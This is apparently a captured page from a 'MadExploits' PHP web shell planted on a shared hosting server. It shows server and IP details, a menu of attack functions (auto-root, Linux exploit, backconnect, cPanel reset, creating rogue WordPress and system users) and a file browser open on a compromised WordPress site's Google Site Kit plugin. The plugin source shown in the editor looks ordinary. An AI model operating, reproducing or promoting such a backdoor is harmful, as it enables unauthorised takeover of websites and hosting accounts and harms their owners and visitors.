Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.188.146.12
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Modules /
Analytics_4 /
[ HOME SHELL ]
Name
Size
Permission
Action
Advanced_Tracking
[ DIR ]
drwxr-xr-x
Conversion_Reporting
[ DIR ]
drwxr-xr-x
GoogleAnalyticsAdmin
[ DIR ]
drwxr-xr-x
Report
[ DIR ]
drwxr-xr-x
AMP_Tag.php
5.15
KB
-rw-r--r--
Account_Ticket.php
3.44
KB
-rw-r--r--
Advanced_Tracking.php
3.96
KB
-rw-r--r--
Audience_Settings.php
2.41
KB
-rw-r--r--
Custom_Dimensions_Data_Availab...
3.53
KB
-rw-r--r--
PivotReport.php
2.16
KB
-rw-r--r--
Report.php
990
B
-rw-r--r--
Reset_Audiences.php
3.86
KB
-rw-r--r--
Resource_Data_Availability_Dat...
7.55
KB
-rw-r--r--
Settings.php
6.36
KB
-rw-r--r--
Synchronize_AdSenseLinked.php
4.48
KB
-rw-r--r--
Synchronize_AdsLinked.php
3.21
KB
-rw-r--r--
Synchronize_Property.php
4.13
KB
-rw-r--r--
Tag_Guard.php
878
B
-rw-r--r--
Tag_Interface.php
821
B
-rw-r--r--
Tag_Matchers.php
2.1
KB
-rw-r--r--
Web_Tag.php
6.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PivotReport.php
<?php /** * Class Google\Site_Kit\Modules\Analytics_4\PivotReport * * @package Google\Site_Kit\Modules\Analytics_4 * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Modules\Analytics_4; use Google\Site_Kit\Context; use Google\Site_Kit\Core\REST_API\Data_Request; use Google\Site_Kit\Modules\Analytics_4\Report\ReportParsers; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Pivot as Google_Service_AnalyticsData_Pivot; /** * The base class for Analytics 4 pivot reports. * * @since 1.130.0 * @access private * @ignore */ class PivotReport extends ReportParsers { /** * Plugin context. * * @since 1.130.0 * @var Context */ protected $context; /** * Constructor. * * @since 1.130.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Parses the pivots value of the data request into an array of AnalyticsData Pivot object instances. * * @since 1.130.0 * * @param Data_Request $data Data request object. * @return Google_Service_AnalyticsData_Pivot[] An array of AnalyticsData Pivot objects. */ protected function parse_pivots( Data_Request $data ) { $pivots = array(); if ( is_array( $data['pivots'] ) ) { foreach ( $data['pivots'] as $key => $value ) { if ( is_array( $value['fieldNames'] ) && is_numeric( $value['limit'] ) ) { $pivots[] = $value; } } } if ( empty( $pivots ) || ! is_array( $pivots ) || ! wp_is_numeric_array( $pivots ) ) { return array(); } $results = array_map( function ( $pivot_def ) { $pivot = new Google_Service_AnalyticsData_Pivot(); $pivot->setMetricAggregations( array( 'TOTAL', 'MINIMUM', 'MAXIMUM' ) ); $pivot->setFieldNames( $pivot_def['fieldNames'] ); $pivot->setLimit( $pivot_def['limit'] ); if ( isset( $pivot_def['orderby'] ) ) { $pivot->setOrderBys( $pivot_def['orderby'] ); } return $pivot; }, $pivots ); $results = array_filter( $results ); $results = array_values( $results ); return $results; } }
Close